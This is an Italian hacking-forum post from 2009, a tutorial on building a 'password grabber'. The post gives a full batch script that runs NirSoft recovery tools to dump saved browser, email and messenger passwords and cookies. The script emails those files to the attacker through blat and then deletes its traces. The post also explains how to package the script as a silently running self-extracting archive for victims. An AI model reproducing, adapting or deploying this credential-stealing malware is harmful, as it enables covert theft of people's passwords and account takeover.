Come Creare un PSW GRABBER

« Older   Newer »
  Share  
Gentile4
icon1  view post Posted on 31/7/2009, 14:43 by: Gentile4




Ci vuole un pò di Animazione in questa sezione ed ecco che oggi vi posto Una guida su Come Creare un Bel Psw Grabber :D


----------------------------------
Indice


- Cosa è un password Grabber?
- Come crearlo
- Avvertenze

----------------------------------

- Cosa è un password grabber?

Un password grabber sono un insieme di programmi esecutibili che scoprono le password salvate nel computer dei vari browser e delle email, e il tutto vi arriva in una email attraverso il blat e dei batch

----------------------------------

- Come crearlo

Innanzitutto scaricatevi alcuni programmi della Nirsoft

Io vi consiglio questi password recovery:


password fox : http://www.nirsoft.net/utils/passwordfox.htm
ie passview : http://www.nirsoft.net/utils/interne..._password.html
mail passview : http://www.nirsoft.net/utils/mailpv.html
MSpass : http://www.nirsoft.net/utils/mspass.html

Poi il blat: http://sourceforge.net/project/showf...group_id=81910

e il bat to exe: http://www.download.com/Bat-To-Exe-C...-10555897.html (opzionale)

Poi creare un file batch dove inseriremo questo codice:

@PASSWO~1.EXE /stext PasswordFox.txt
@mzcv.exe /stext mzcv.txt
@iepv.exe /stext iepv.txt
@mspass.exe /stext mspass.txt
@mailpv.exe /stext mailpv.txt
@COPY blat.exe C:\WINDOWS\system32\blat.exe
@COPY blat.dll C:\WINDOWS\system32\blat.dll
@COPY blat.lib C:\WINDOWS\system32\blat.lib
@blat -install out.alice.it [email protected]
cls
@blat PasswordFox.txt -to [email protected] -try 2 -subject Firefox
@blat mzcv.txt -to [email protected] -try 2 -subject Cookie
@blat iepv.txt -to [email protected] -try 2 -subject IE
@blat mspass.txt -to [email protected] -try 2 -subject Msn
@del blat.exe
@del blat.lib
@del blat.dll
@del *.txt
@del *.exe
@del *.bat
end



[ Se volete aggiungere altri password recoveri basta inserire

Nomeprogramma.exe /stext nomeprogramma.txt
inserire la funzione
@blat nomeprogramma.txt to [email protected] -try 2 -subject nomeprogramma ]


Poi convertirlo in Exe con il programma Bat to Exe (Opzionale)
Mettere tutti i file .exe scaricati e aggiungerli ad un archivio e creare un file auto-estraente

Mettendo le seguenti opzioni:
In esegui dopo l'estrazione mettete : nomeprogramma.exe (se avete lasciato il batch nomeprogramma.bat)
Andate in modalità e selezionate nascondi tutto e sovrascrivi tutti i file

Premere OK.

Ecco Fatto ! Buon Divertimento a Tutti :B):
 
Top
6 replies since 31/7/2009, 14:43   1686 views
  Share